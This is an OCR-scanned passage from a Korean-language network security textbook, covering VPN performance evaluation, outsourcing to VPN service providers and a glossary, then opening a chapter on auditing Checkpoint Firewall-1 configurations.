어암호화추가품을 제공하고 있다. 설정이 가능한 모든 보안도구에서와 마찬가지로 방화 
벽에도 그 어떤 변경을 해놓으면 그 보안이 다 와해된다. 방화벽에 있는 공통관리대면부 
를 리용하면 VPN 관리 가 더 잘될수 있다. 울타리방화벽 으로서 한개의 점 에서 진입 과 랄 
출을 다 분리시키기때문에 이것이 리상적인 자리라고 할수 있다. VPN 봉사기를 방화벽 
에 추가하면 하드웨어 VPN , 쏘프트웨어 VPN , 경로기 VPN 과 관련한 배치상 문제점들이 다 
없어 지게 된다. 실례로 암호화된 파케트들이 방화벽에 있는 구멍을 통하여 빠져 나와 
야 하는가，방화벽 이 NAT (망주소변환)등을 수행하면 어떻게 되겠는가 등의 문제들이 다 
없어 지게 된다. 

방화벽겸 VPN 방식 을 도입하면 방화벽 에 서 VPN 런넬 이 끝나며 자료복호화와 검 열 
을 할수 있게 된다. 이 능력이 우월하다는 식의 씨나리오는 VPN 런넬을 오고가는 자 
료에 대 하여 방화벽상주항비 루스쏘프트웨어 를 돌릴 필 요가 있는 경 우에 더 욱 그럴듯 
하게 된다. 

각종 VPN 에 대한 일반관리문제 

쏘프트웨어식 VPN 관리는 누가 해야 하는가 하는 질문이 제기될수 있다. 망운영그룹， 
보안그룹，자료소유자사이에 관리분담이 되여야 한다. 망운영문제는 망실현계획과 설계계 
획을 결정할 때에 반영되여야 하는데 그것은 이 그룹의 업무가 주로 회사자료의 리용성 
과 회사자료의 무결성을 보장하는것이기때문이 다. 보안그룹은 전반체계의 설계와 능력을 
분석하여 보안방책 에 부합되 게 해 야 한다. 이 경 우 자료소유자는 VPN 을 리용하여 접 근 
을 제 한시키는 운영그룹을 말한다. 자료소유자는 접 근조종과 사용자의 재정기록부설 치를 
담당할수 있다. 리상적인 조건에서 이러한 분업관계가 있으면 VPN 관리에 대해서도 분담 
관리제를 실시할수 있다. 현실적 으로 이 러한 분담관리가 협조에 의하여 실현되는 경우는 
거의 없다. 


VPN 성능평가 


지금까지 말단사용자와 관리자의 견지에서 VPN 을 평가하는 기준들을 보았다. 그 
러 나 VPN 판매 업 체 들이 시 장실현도구로서의 성능평 가기준을 어 떻게 작성하는가 하는 
것 을 리해하는것 도 도움이 될 것 이 다. 많은 판매 업 체 들이 제 공하는 VPN 제 품들을 보면 
그들의 분류기 준은 동시 VPN 접 속회 수，최 고통화수 혹은 처 리 량이다. 대 부분의 보안전 
문가들은 그 실행 이 얼 마나 안전한가에 관심 을 두며 대 부분의 망운영 성원들，특히 
ISP 성원들은 VPN 관문이 얼마나 많은 의뢰기나 원격사용자런넬을 지원하는가에 관심 
를 가전다. IPSec 원격사용자런넬은 IKE 의 암호열쇠변환 1단계 와 2단계 의 완성 으로 정 
의 될수 있다. 

이 단계들이 완성되여야 안전한 런넬이 형성되여 매개의 원격통화가 가능해 진다. 
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판매 업체들은 흔히 여 러 가지 정의들을 만들어 자기 회사의 제품들이 최고의 성능을 발휘 
하는것으로 광고하기때문에 이것은 주관적인 정의이다. 

많은 판매 업 자들이 하나의 수자를 리용하여 실지 배비 에서 의 VPN 처 리 률을 특징 지 
으므로 조건에 따라 성능이 매우 크게 변할수 있을것이다. 다음 부분에서는 실지 현실에 
서 배비를 할 때 처리률에 영향을 주는 요인들을 개괄한다. 


과케트크기 


자료암호화와 인증과 같은 VPN 의 대부분의 조작들은 파케트단위로 진행된다. CPU 
에서의 조종프로그람실행시 간은 파케 트의 크기와는 무관계하다. 따라서 파케 트크기 가 콜 
수록 자료처 리률수치 는 더 욱 커 진 다. 인 터네 트에 서 IP 파케 트의 보통 크기 는 대 략 300 byte 
이다. 대부분의 판매업체들은 상대적으로 큰 평균파케트크기인 l ，000 byte 나 그이상에 기 
준을 잡고 VPN 처 리 량특성값들을 제 시 하고 있 다. 따라서 판매 업 체 들에 게 처 리 량명 세 에 
대 하여 물어 볼 때 에는 넓은 범위의 평균파케트크기 를 따라 가며 확정하여 예 상성능을 
보다 더 잘 측정하도록 해 야 한다. 

암호화 및 인증알고리듬 

암호화알고리 듬이 강하려 면 더 많은 체 계 자원을 리용하여 수학적연산을 하여 야 한다. 
이 때 자료처 리량은 더 작아 진다. 례 를 들어 DES (56 bit 세 기)암호화에 기 초한 VPN 처 리 량 
은 3 DES (168 bit 세 기)암호화에 기 초한 처 리 량보다 더 콜수 있 다. 스트림암호변환기 는 블로 
크암호변환기보다 대체로 더 빠르다. 

자료인증알고리듬은 자료처 리량에 류사한 효과를 준다. 실례 로 MD 5 인증은 SHA 1 와 
비교해 보면 약간 더 큰 처 리 량을 나타낸다. 

호스트 CPH 

쏘프트웨어 에 기 초한 VPN 방안을 리용하면 고객 들이 클라스나 박자속도가 서 로 
다른 중앙처 리 장치중에 서 자기 가 좋아 하는것 을 고를수 있다. 하드웨 어식 가속선 택 이 
없는 VPN 제품에서는 호스트처 리능력 이 특별히 중요하다. VPN 을 검사해 보면 보충적 
인 일 반 CPU 를 VPN 봉사기 에 추가해 주어 도 성 능이 선형적 으로 증가하지 않는다는것 
을 알수 있다. 어느 판매업체의 주장에 따르면 Windows NT 봉사기상에서 가령 하나의 
중앙처리장치부하가 100%일 때 두번째 중앙처리장치를 끼워도 CPU 자원은 5%밖에 덜 
어 지 지 않는다고 한다. 또한 그 주장에 의하면 봉사기 에 일 반 CPU 를 추가하지 않고 
암호화가속장치 를 리용하였 는데 그 처 리 량이 7배 로 증가하더 라는것 이 다. 다른 경 우들 
에 는 하드웨 어가속에 비 하여 일 반용 CPU 를 덧붙였을 때 의 가격 혹은 성 능은 앞의 실 
례들과는 반대 로 나타났다. 어 느 한 경 우에 는 일 반 CPU 추가원 가가 하드웨 어가속기값의 
두배 나 됨 에도 불구하고 성능은 실제 로 더 적게 증가하는것이 였다. 속도는 CPU 에 달 
려 있는것 이 아니 라 I 八)모선， RAM , 캐 쉬 에 달려 있다. 축소명 령모임 ( RISC ) CPU 들은 





일 반 CPU 보다 더 빠르며 특수용도집 적 회 로 (ASIC) 들은 설계 상 RISC 처 리 장치들보다 대 
체로 빠르다. 


조작체계와 보강준우 I 

쏘프트웨 어 식 VPN 을 리용하게 되 면 고객 들은 각이한 조작체 계 에서 하나를 선택해 야 
한다. 조작체계들을 사과를 비교하듯이 할수 없기때문에 고객들은 성능평가기준을 자기 
들의 대 상조작체 계 에 맞게 끔 주어 야 한다. 또한 조작체 계 의 수정준위 는 처 리률에 큰 영 
향을 미칠수 있 다. 흔히 최 신조작체 계 의 보강준위 로서 는 더 좋은 성 능을 낼수 있게 된다. 
만일 VPN 요구사항이 조작체 계 형 VPN 기 술을 쓸것 을 요구한다면 대 부분의 쏘프트웨 어방화 
벽들이 그러 하듯이 필요한 조작체 계의 《 경화》를 수행하는 쏘프트웨어제품들을 고려해 
보는것 이 좋다. 갱 신관프로그람，보안경 보，수정 갱 신판을 제 공하는 봉사체 계 에 가입하는 
것도 고려해 볼수 있다. 

망대면부기판구동기 

망대 면부기판 (NIC) 판본도 처 리률에 영 향을 줄수 있 다. 흔히 최 신판 망대 면부기판구 
동기 들은 성 능이 가장 좋다. 현재 수많은 망대 면부기판제 작업 체 들은 IPSec 형 VPN 들에 
보완적 인 기 능을 수행하는 제 품들을 내 놓고 있다. NIC 를 사용자콤퓨터 나 암호화와 복 
호화를 수행하는 IPSec VPN 관문에 설 치하면 CPU 사용률은 낮추면서도 체 계성능은 높 
일수 있다. 이 렇게 하려면 NIC 에 직 접 처 리 장치하나를 설치해 야 NIC 가 망전송량처 리 
의 대부분을 말아 수행함으로써 호스트체계가 봉사응용프로그람에 더 집중할수 있게 
된 다. 

기억기 

VPN 이 원격사용자런넬별로 범 위조절을 할수 있는 능력 은 관문봉사기 에 설 치된 체 
계 기억기의 용량에 달려 있다. 많은 VPN 용품(이것들은 고정된 용량의 기 억기를 가지 고 
있 음)들과는 달리 쏘프트웨어 형 VPN 들은 핵 심 부에 서 의 최 고동시 접 속수에 서 한계 가 있 
으므로 동시회선지 원과 원격사용자런넬에서 제한을 받는다. 일부 경우에는 동시접속이 
VPN 응용 대 리 자접속한계 에 의해 제 한되 기도 하는데 이것은 호스트핵 심부한계와는 무 
관계하다. 그러나 대부분의 VPN 전개에서는 접속한계수자에 도달하기전에 벌써 처리량 
한계 에 부닥치군 한다. 쏘프트웨어 에 기초한 VPN 가동환경의 기 억기확장성과 전용하드 
웨어의 처 리 상 우점들을 잘 결합하여 야 량자의 최상의 효과를 기 대할수 있다. 다음의 
가상적인 실례를 고려해 보자. 어느 한 기관이 하드웨어가속기가 설치된 쏘프트웨어식 
VPN 에 30Mbps 의 인 터네 트를 접 속시 켰 다. 이 기 관에 서 는 원격 사용자 한명 당 필 요한 평 
균자료속도는 대 략 40K 이 다. 이 씨 나리오에 서 VPN 은 대 략 750 명 의 원격사용자를 동시 
지원할수 있다. 일단 사용자수가 750 명이상으로 오르면 평균자료속도와 해당 사용자의 
사용률은 떨 어 지기 시 작할것 이 다. 여기 에서 명 백한것은 믿음직한 동시사용자지 원이 
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제 한 받게 되 는것 은 접 속수의 한계 가 아니 라 쏘프트웨 어 식 VPN 관문의 처 리률때 문이 라 
는것 이 다. 이 런 관점 에서 보면 쏘프트웨 어 식 VPN 배비 에서 규모조절을 하여 수천명 의 
사용자를 동시 에 처 리할수 있게 하는데서 관건적역 할을 하는것 은 바로 암호화가속카드 
이 다. 

수자 하나만 가지고서는 W n 의 처 리성능을 정 확히 측정할수 없다. 실례로 VPN 에서 
전송되 는 파케 트의 크기 는 처 리 률에 큰 영 향을 준다. 파케 트크기 가 작으면 체 계성능이 
떨어 진다. 파케트크기가 작을수록 호상 더 많은 수의 파케트들이 처리되고 간접비는 더 
높아 지며 결국 효과적인 처리량은 더 낮아 진다. 암호화가속카드는 큰 파케트와 작은 
파케 트를 다 동조하여 처 리할수 있 으므로 모든 파케 트크기 들에 한하여 다 성 능이 최 량화 
된다. 성능에 영향을 주는 다른 요인들로서는 체계설정 (CPU, 기억기，캐쉬 등)，암호화알 
고리듬，인증알고리듬，조작체계，전송형태 등이 있다. 이 대부분의 요인들은 모든 VPN 제 
품들에서도 마찬가지이다. 따라서 경쟁적인 VPN 제품들에 있는 성능명세를 보고 그 수값 
들을 모든 환경 에 서 직 접 현실값과 비 교하거 나 실지적 인것 이 라고 생 각하면 안된다. 

자료압축 

성 능을 대 폭 올리 고 말단사용자들이 만족감을 가지 게 하려 면 VPN 에 서 의 속도지연을 
최소화하여야 한다. 지연최소화방도는 적은 전송량을 보내는것이다. 이렇게 하려면 VPN 
상에 보내기전에 자료를 압축해야 한다. 압축으로 인한 성능증가는 어떤 자료를 보내는 
가에 따라 달라 진다. 그러나 일반적으로 자료가 일단 암호화되면 압축되지 않으므로 암 
호화하지 않는것이 낫다. 자료압축은 특히 낮은 대역너비의 상사형전화회선 VPN 접근을 
최 량화할 때에 성능향상에 매우 중요한 역 할을 한다. 이때 MTU (최고전송속도)의 크기와 
조각화가 주요원인으로 될수 있다. 

원래성능이 가장 중요한 기준일가 

VPN 평가에서 사용자들이 어느 특성들을 가장 중요시하며 앞으로 나오는 제품에서 
무엇 을 바라는가를 밝혀 내 기 위하여 진행한 최 근의 VPN 사용자조사자료에 의하면 
VPN 평가에서 보안보다 성능이 더 높은 요구로 제기되고 있다는것이 밝혀 졌다. 이것 
은 VPN 기초기술의 보안에 대하여 믿는 사람이 얼마 없던 초기 VPN 시기로부터 사고방 
식이 완전히 달라졌음을 보여 주는것이다. 특히 VPN 기술과 제품에 대한 신뢰도가 
《높은》것으로 평가하는 보안전문가들속에서 그런 관점 이 지배적이다. VPN 을 잘 알 
고 있는 사람들은 보안제품들에 대하여 신뢰성을 가지고 있으며 성능과 관리는 다음의 
큰 문제 라고 보고 있 다. 보고서자료에 의하면 기 본보안부분품들이 우려 되 고 있지 만 그 
렇다고 하여 VPN 성능이 절대로 희생되여서는 안된다고 사용자들이 주장하고 있다고 
한다. 또한 조사에 서 밝혀 진데 의하면 사용자들이 많은 관심 을 돌리 는것 은 성 능，실 행 
보안 및 리용성 과 갈은 높은 급의 요구들이 며 적 게 관심 돌리 는것 들은 VPN 의 기 본기 술 
과 규약이라고 한다. 
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VPN 에 대한 외탁 (Outsourcing) 


외부의 지식 있는 봉사제공자에게 위탁하면 말썽거리가 생겨도 전문가가 있어 일 없 
겠다는데로부터 일정한 안전감을 가지게 된다. 외탁 즉 외부의 자원을 리용하면 자기 회 
사의 보안관리자들은 지사들이 망에 추가할 원격사용자들을 설치 및 시험할 때마다 VPN 
을 물리적으로 갱신하느라고 애 쓰지 않아도 된다. 자기회사에 지역적으로 널려 진 기관 
망이 없는 경 우에 는 VPN 의 통과점 만 인 터네 트봉사제 공업 체 나 개 별 IP 망제 공업 체 에 외 탁 
하면 될것 이 다. 그러 나 일 반 인터네 트접속이 되 였다 하여 VPN 상 전송량이 최 대부하시 간 
에 인 터네 트상의 전송량과 합쳐 져 막힘 현상이 일 어 나지 않으리 라고는 크게 확신할수 없 
는것 이 다. ISP 나 VPN 봉사제공자들은 필요한 하드웨 어와 쏘프트웨어를 선정 하여 설치할 
뿐아니 라 기 술봉사와 지 속적 인 유지 보수임 무를 훌륭히 수행하여 야 한다. 

표 9-1 은 VPN 봉사제 공자평 가에 서 고려해 야 할 일 부 요인들을 제 시 하고 있 다. 

표 9_7 VPN 봉사제공자평가항목 


VPN 봉사제 공자평 가시 고려해 야 할 요인들은 다음과 같다. 


• 봉사의 질 

• 신뢰도 

• 보안정도 

• 관리능력 

• 봉사제공자 자체망과 망관리쎈터의 보안상태 

• 봉사제공자의 인원채용관례에 대한 조사(전문지식，신원조회) 

• 봉사제 공자는 VPN 배비 를 전후하여 어 떤 봉사를 제 공하는가(취 약성 평 가와 토론봉사) 


신릐도 

사용자들이 망에 들어 가지도 못하며 접속도 제 대로 안된다면 보안이라는것은 무의 
미하다. VPN 의 목적 이 이 동근무자들에 게 원격 접 근을 제 공하는것 이 라면 성 능의 기 본측면 
은 봉사제공자가 해당 봉사지역내에 얼마나 많은 호상 접속점들을 가지고 있는가에 따라 
평가될것이며 이것이 또 전화회선시 접근의 성공률이 얼마인가를 담보하는것으로 될것이 
다. 실례로 어느 VPN 봉사제공자(전송 및 보안봉사제공)가 97%의 접속률을 가진 전화회선 
식원격접 근을 제 공하는데 초기모뎀련결속도는 26.4 KB / S 이 상이 며 시 간보장률이 99%라고 
한다. 다른 VPN 봉사제 공자(전송 및 보안봉사제 공)는 100%의 망리용률，전화회 선식 봉사의 
95%의 접속성공률을 보장한다. 이러한 담보가 맞지 않으면 봉사제공자는 대체로 일종의 
재정적보상이 나 봉사신용을 약속한다. VPN 통신 및 보안봉사는 각각 따로 외 탁할수 있다. 

그러 나 회 사에 넓 은 지 역 망봉사가 기 본목표라고 한다면 전반적 망의 리용률과 속도가 
주되는 관심사로 될수 있다. 봉사제공자들은 현재 전반적망의 평균값들을 기초로 하여 
처 리률，회 전지 연시 간，리용성 등과 갈은 일정한 수준의 성 능을 담보하는 방법 으로 이 문 
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제를 대처하고 있다. 자체의 기관망을 구축하는 봉사제공자들은 그것을 리용하여 많은 
고객 VPN 을 지 원하고 있 다. 일 부 VPN 봉사제 공자들은 비 동기 전송방식 이 나 프레 임 중계식 
전송을 통하여 고객 VPN 에 개 별 WAN 봉사를 해주고 있다. 이 렇게 VPN 전송은 일반인터네 
트전송과 대 역너 비싸움을 할 필요가 없으므로 VPN 봉사제공자들은 망의 끝점 대 끝점성 
능을 관리하는 사업 이 나 잘하면 된 다. 

봉사의 질 

VPN 봉사제공자들이 최근에 성능담보를 시작하는 분야는 성능에 예민한 전송자료들 
인 육성자료와 다매체자료들이다. 실례로 망에서 비데오자료는 고속전송해야 쓸수 있으 
므로 일 반 파일 전송보다 비 데오전송에 더 큰 우선권을 부여할수도 있 다. 현재 난점 은 망 
경계를 넘어서 이 담보를 할수 있겠는가 하는 문제이다. 단일한 망을 통하여 자료전송이 
현재 가능한것만은 사실이지만 여러개 망을 거처야 하는 경우는 어쩔수 없다. 그것은 
MPLS 와 같은 표준들이 나오고 있지 만 인 터네 트는 더 말할것 도 없 고 일 반적 인 망에 서 조 
차 현재 전송자료의 순위를 정하는 단일한 규정이 제시되여 있지 않다. 

더 좋은 성 능을 담보하기 위하여 많은 VPN 봉사제 공자들은 봉사준위 의 협 정 들을 체 
결 하고 있 다. 봉사의 질 에 해 당하는 추가료금지 불을 위하여 VPN 봉사제 공자들은 처 리 량， 
전화회선접속，망리용률에 대한 담보를 고객들에게 제공할수 있다. 일부 VPN 봉사제공자 
들은 자체의 프레임중계나 비동기전송방식망들을 제공하여 VPN 전송량을 거기에서 경로 
조정함으로써 성능을 높이고 있다. 

보안 

VPN 에서는 암호화，런넬화，인증 및 권한부여를 적절히 결합함으로써 보안을 보장한 
다. 방화벽은 신뢰성 있고 허용된 합법적인 파케트나 사용자들만 회사망에 접근시킴으로 
써 회사내 보안방어를 보장한다. 회사들은 자기들의 VPN 보안방법을 VPN 봉사제공자가 선 
택하도록 할수 있으며 그 관리 를 회 사자체 로 하든가 아니 면 봉사제 공자가 그 관리 기 능을 
수행하게 할수도 있 다. 다른 방도로서 는 고객 이 자체 로 VPN 전반에 대 한 보안방책 을 정 의 
하게 할수도 있 다. 대 부분의 보안관리자들은 자기들의 망보안에 대 하여 일정한 정 도의 통 
제권을 보유하는것을 더 좋아 하는데 그것은 주로 말단사용자에 대한 관리，방책 및 인증 
분야이 다. 회 사들은 자체암호화를 선택할수도 있으며 자체보안봉사기 를 운영할수도 있으 
나 감시 나 경 보대 응과 같은 기 타 VPN 관리 문제들은 VPN 봉사관리 자들을 시켜서 처 리할수 
도 있다. 보안관리와 관련하여 외 탁을 하겠는가에 대 한 결심채 택은 회사의 규모와 IT 자원 
의 규모에 달려 있다. 일부 회사들의 경우 외탁결심채택은 회사의 자료의 비밀적성격과 
외 탁에 대 한 IT 관리 자들의 신뢰도와 더 많이 관련되 여 있다고도 볼수 있다(표 9-7 참고). 

관리능력 

고려해 야 할 또하나의 문제 점 은 VPN 봉사제 공자에 게 필요한 관리 능력 과 보고능력 이 
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다. 많은 VPN 봉사제 공자들은 가입 자들에 게 망성 능자료와 고객 사용률보고서 에 일 종의 
Web 접근을 할수 있게 한다. Web 도구들을 쓰면 사용자들은 원격설정，사용자추가 및 삭 
제，갱 신을 진행하는 문제 , 수자식 인증서발급을 통제하는 문제，성 능준위자료감시 등과 
갈은 문제 들을 자체 로 수행할수 있 다. 고객 들이 사용자추가 및 삭제 를 하며 높은 급에 서 
방책변경 을 제 기할수 있게끔 관리 가 분할된 제 품을 VPN 봉사제 공자가 제 공할수 있는가 
없는가 하는것도 알아 보아야 한다. 


요 약 


VPN 평가전략을 잘 세우면 보안전문가들은 제작업체가 가장한것과 실지 성능지표들 
을 갈라 내 여 회사자체의 VPN 체계 에 대 한 요구를 보장할수 있게 될것 이 다. 기본은 필요 
한 VPN 실 현형 태 에 부합되 는 전 략과 기 준들을 설 정하는것 이 다. 평 가기 준들에 서 는 필 요되 
는것들에 대한 정의를 정확히 주어야 한다. 실천적으로 검증된 실험실조건에서의 평가를 
하면 어떤것을 가져다 씨야 하는가를 보안전문가들이 정확히 알게 될것이다. VPN 설치에 
대 한 세부 사항들에 주의를 돌려 야 하며 선정된 VPN 봉사제공자나 제품판매 업체 에 대 한 
경각성을 높여 야 한다. 

또한 VPN 전개전략을 심사숙고하여 짜게 되면 실현비용을 낮추고 사용자들의 호평을 
높이 게 되 며 투자률，수익 률을 가속화할수 있 다. 전개 전 략은 VPN 응용형 식 과 VPN 배비모 
형을 어떻게 선택하는가에 따라 달라 질수도 있다. 

전통적으로 보면 판매업체들이 추구하는것은 고객들에게 선택항목들을 될수록 적게 
주어 판매주기를 간소화하는것 이 다. 그 방도의 하나로서 VPN 제품의 성능특성값들을 극히 
간단하게 해 놓는것 이 다. 작은 규격，중간 규격，큰 규격 중에 서 어 느것 을 사렵니 까? 10명 의 
사용자가 쓰는 VPN 봉사기，100명 용봉사기，1,000명 용봉사기 중에 서 어 느것 을 사렵니 까? 
100MHz 아니 면 mbit 모형 을 사렵니까? 이 런 질문들이 제 기된다. 판매 업 체 들에서 자기 주 
장을 정 당화하는데 필요한 파라메터들을 제공하겠으면 제공하라고 하라，중요한것은 보안 
전문가들이 판매업 자들이 쓰는 특정성 능값들과 평 가방법론들을 알면 되는것 이 다. 이 러한 
지식들을 알고 있으면 보안전문가들은 제품선택에서 정확한 결심채택을 할수 있을것이다. 

VPN 을 실현하는데 는 많은 방도들이 있을것 이 다. 보안관리봉사제 공자들은 일부 부담 
을 덜고 VPN 실현을 신속하게 도와 줄수 있을것이다. 그러나 보안전문가들은 봉사제공자 
선택 에 서 응당한 성 실성 을 발휘 하기 위하여 적 극 노력해 야 할것 이 다. 


용어해설 


ATM (Asynchronous Transfer Mode) 비 동기 전송방식 

초고속능력 의 수자통신수단으로서 자료전송뿐아니 라 영 상，음성 및 비 데 오전 
송에 적합하다. 주로 기관망에서 리용된다. 
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DSL(Digital Subscriber Line) 수자식 가입 자선로 

경쟁적 인 지 역교환통신회사들과 지 역전화회사들_이 자기의 가입자들에 게 광대 
역 접근을 제 공하는 고속수자식 선 로들의 총칭 

FTP(File Transfer Protocol) 파일전송규약 

사용자들이 자기의 현지 를퓨터와 망상의 임의의 체계사이에 파일을 복사할 
수있게 하는 규약으로서 여기에는 FTP 의뢰기와 FTP 봉사기 두가지가 있다. 

IKE(Intemet Key Exchange) 인터네 트암호열쇠교환규약 

IPSec VPN 통화시 사용하는 보안파라메터 (보안련계 라고도 함)들을 구축하는데 
쓰이는 규약 

IPSec(IP Security Protocol) IP 보안규약 

VPN 에 서 사용되 는 표준규약묶음으로서 암호화 및 자료무결성알고리 듬들과 
규칙들을 정의하여 안전한 IP 파케트의 형식과 전송을 규제해 준다. 

Kbps(Kilobits per second) 초당 키 로비 트 

Mbps(Megabit per second) 초당 메 가비 트 

MSP(Managed Security Service Provider) 보안관리 봉사제 공자 

고객 들을 대 표하여 각이 한 망보안과제 들을 맡아 수행 해 주는 봉사제 공자나 
봉사제 공업 체 의 한 부류이 다. VPN 봉사제 공자들은 VPN 봉사기/의 뢰기 전개 를 방조 
하며 VPN 의 운영관리를 맡아 해준다. 

SSL(Secure Socket Layer) 안전소케트층규약 

Netscape 회 사가 원래 개 발한 안전규약이 다. SSL 은 의뢰 기 와 봉사기 사이의 
전송을 인증하고 암호화하여 진행함으로써 WWW 에서 보편적으로 인정되여 왔다. 
SSL 은 흔히 FTP 와 같은 다른 TCP/IP 를 안전하게 하는데 사용될수 있지만 주로 
열 람기 에 서 쓰인 다. SSL 은 TLS 로 전환되 였 다. 

TLS(Transport Layer Security Protocol) 전송층보안규약 

IETF 가 제 안한 표준규약초안으로서 인터네 트상에서 통신의 사적 비 밀을 보장 
하는데 쓰인다. 이 규약을 리용하면 의뢰기/봉사기에서 도청，조작，통보문위조를 
방지하게 끔 할수 있 다. 

VPN client VPN 의 뢰 기 

개 별적 인 사용자콤퓨터 에 상주하며 VPN 런넬을 구성하여 VPN 봉사기 로 접속 
하게 하는 쏘프트웨 어 이 다. 

VPN server VPN 봉사기 

중앙위치 에 상주하여 VPN 런 넬 을 종결 시키 는 장치 (IPSec 보안관문)이 다. 

VPN 의뢰기와 다른 VPN 봉사기와 통신을 한다. 쏘프트웨 어식 일수도 있고 하 
드웨 어식 일 수도 있 다. 

VPN(Virtual Private Network) 가상개 별 망 

자료의 비밀성，인증，자료무결성을 보장하여 자료를 전송할수 있는 능력을 
가진 망이다. 
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제 1 0장. Checkpoint 방화벽보안점검을 
어떻게 할것인가 


벤 로드커 


《변경된 상태》는 인간의식의 변경된 상태를 시험 하는 과학자에 대한 단순한 과학 
환상영화가 아니였다. 이것은 대기업들이 가지고 있는 많은 방화벽에 대하여 표현한 말 
이기도 하다. 

일반적으로 방화벽이 처음으로 구축되면 그 기관의 보안요구사항은 엄격해 진다. 집 
단적환경에서 쓰게 되면 방화벽의 규칙기지，설정상태，주요조작체계들이 완전히 다른 형 
태들로 변화되기 쉽다. 이 변경된 방화벽상태는 방화벽점검을 필요로 한다. 

방화벽은 설정의 정확성정보만큼 효과를 나타낸다. 오늘날의 집체적환경에서 방 
화벽의 설정상태는 나빠지기가 일쑤이다. 방화벽설치상태를 점검해 봄으로써 경영진 
은 이 방화벽이 예견한대로 안전하게 자기의 역할을 하고 있는가를 확인할수 있을것 
이다. 

이 장에서는 Checkpoint 의 Firewall -1 에 대하여 방화벽점검을 하는데 초점을 둔다. 이 
내용들聲 그 대부분이 Cisco PIX , NAI Gauntlet , Accent Raptor 등 그 어느 방화벽에 나 다 
긴밀한 련관이 있을 정도로 상당히 보편적인것들이다. 그러나 한가지 경고할것이 있다. 
즉 여 기서 중요한것은 방화벽점 검 이 결코 침투시험 은 아니 라는것 이 다. 방화벽을 점검하 
는 목적은 남의 약점을 찾아 내여 방화벽을 뚫고 들어 가자는데 있는것이 아니라 방화벽 
의 실수로 열어 놓은 구멍들과 위협요소들을 찾아 내자는데 있다. 

마지 막으로 방화벽점 검 역 시 방화벽조작체 계 나 주요망조작체 계 가 완전히 안전 하다는 
것을 확인하거 나 보증하는 과정 이 아니 라는것도 충분히 알아야 한다. 

방화벽점검의 필요성 


방화벽도 사람과 같아서 점검해 보아야 한다. 일터에서는 이것을 사업능률점검이 
라고 하며 의 학분야에서는 이것을 검 진이라고 한다. 정기적 으로 방화벽을 점검하는것 
은 필수적요구이다. 그것은 설정이 잘못된 방화벽은 방화벽이 없는것보다도 더 못하 
기때문이다. 방화벽이 없으면 위험이 조성되며 근본적인 보안대책이 없다고 생각한다. 
그러나 설정이 잘못된 방화벽을 가지고 있으면 보안이 잘되고 있는것처럼 잘못생각할 
수 있게 된다. 

보충적 으로 말하여 방화벽 은 흔히 제1차적 인 정 보보안체 계이 므로 방화벽 에 그 
어떤 결함이나 설정상 오유가 있으면 전반적기업에 그것이 큰 영향을 미친다는것이 
다. 방화벽점검을 전혀 하지 않으면 이러한 결함들이 퇴치되지 않은채로 남아 있게 
된 다. 
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점검，검열 및 평가 


방화벽점검을 흔히 검열이라고 한다. 검열이란 《차례차례 구체적으로 조사하여 
총화해 보는것》이라고 정의한다. 점검，평가，검열 등의 단어들은 흔히 동의어적으로 
쓰인다. 북아메리카의 5 대 회계회사들에서 무은 보안그룹이 보안점검을 할 때면 흥미 
있게 도 그들은 《 감사》라는 말을 쓰게 되 여 있지 않다고 한다. 그 리유는 이 5 대 회 
사들을 감독하는 공공회 계 연구소 (www.aicpa.org) 가 해 당 환경 에서 검 열을 진행 할만한 
공식적인 정보보안표준제도가 없다고 하면서 《검열》이라는 용어를 쓰지 못하게 하 
였 다는것 이 다. 

한편 재정검열은 일반공인회계원칙 (GAAP) 에 어긋나게 진행되고 있다. 고정된 규정 
은 아니 지 만 GAAP 는 재 정 정 보를 보고하기 위한 널 리 인정 된 관례，기 준 및 절 차의 틀 
거리이다. 재정회계규정 위원회 (www.fasb.org) 는 1973 년에 이 GAAP 를 작성 하여 내놓았 
다. 이 재 정회 계 규정위 원회 의 사명 은 재정정 보의 발행 인，검 열원，사용자들을 비 롯한 
사회 일 반사람들을 지 도교육하기 위한 재 정회계 및 보고에 대 한 규정 을 작성 하고 개 선 
하는것 이 다. 

20()1 년 1 월 현재 일 반공인체 계보안원칙 (GASSP) 위 원회 는 국제 정 보보안재 단 (IISF) 을 
설립하고 재정을 보장하기 위한 계획이 담겨 진 업무초안을 작성하는 기초단계를 거치고 
있다. 현재는 일반적으로 공인된 한조의 보안방책도 없지만 이러한 규정을 작성하기 위 
한 사업 이 지 금 진척중에 있 다. 그 재 단을 연구완성 하기 위한 사업 과 GASSP 의 틀거 리 를 
문안작성 하고 승인하기 위한 사업 도 현재 진행 중에 있 다. 이 위 원회 는 GASSP 세 부원칙 을 
마무리 하기 위한 하나의 세부계획과 IISF 자금조달이 진행되면 즉시 그 계획을 실행하기 
위한 안을 개 발하여 놓았다. 

GASSP 가 없으면 하부구조의 보안유지를 위한 권위 있는 법적기초가 없게 된다. 
GASSP 같은것 이 있 다면 일정한 정 도의 법 적준수를 실시 하고 그에 기 초하여 근거 가 합당 
한 GASSP 의 례 외 조항 혹은 리탈조항들을 공식 적 으로 승인해 줄수 있는 방도가 나설것 
이다. 

GASSP 와 리 론적 으로 류사한것은《 공통표준계 획》 (http:// csrc.nist.gov/cc) 이 다. 공통표 
준은 국제 적 인 규모로 진행 되 는 개 발계 획 으로서 정 보기 술제 품과 체 계 들의 보안적특성 을 
최종평 가하는 방법의 하나이 다. 이 러한 공통표준기지 를 구축하면 정보기술보안평 가의 결 
과가 보다 광범한 사회계 에서 더 욱 설득력 있게 될것 이 다. 

공통표준은 개별적인 보안평가결과들을 서로 비교할수 있는 조건도 마련해 줄것이다. 
정보기술제품 및 체계의 보안적기능과 보안평가를 진행할 때 이 제품 및 체계에 적용할 
수 있는 품질 담보대 책 에 대 한 공통적 인 요구사항들을 제 시하면 이 비 교가 더 쉽 게 될수 
있다. 이러한 보안평가과정이 진행되면 이러한 제품 및 체계의 안전기능과 담보대책이 
이 요구사항들에 부합된다는 일정한 정 도의 신뢰 도가 조성된다. 평 가결과를 보면 정 보기 
술제품 및 체계가 목적한바대로 안전한가 그리고 사용에서 있을수 있는 보안상 위험요소 
들이 허용할만한것인지에 대한 결심이 설것이다. 
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방화벽점검단계 


방화벽구조，안전대책안 그리고 공정에 대한 전반적인 점검의 내용은 다음과 같다. 

• 기초시설에 접근하는 종업원 및 거래대상자들의 기초시설접근을 규제하는 절 
차들 

• 기초시설의 물리적 및 론리적구조 

• 기초시설의 하드웨어 및 쏘프트웨어의 판본들과 주요망조작체계 

• 접근조종정보에 대한 기초시설적통제수법들 

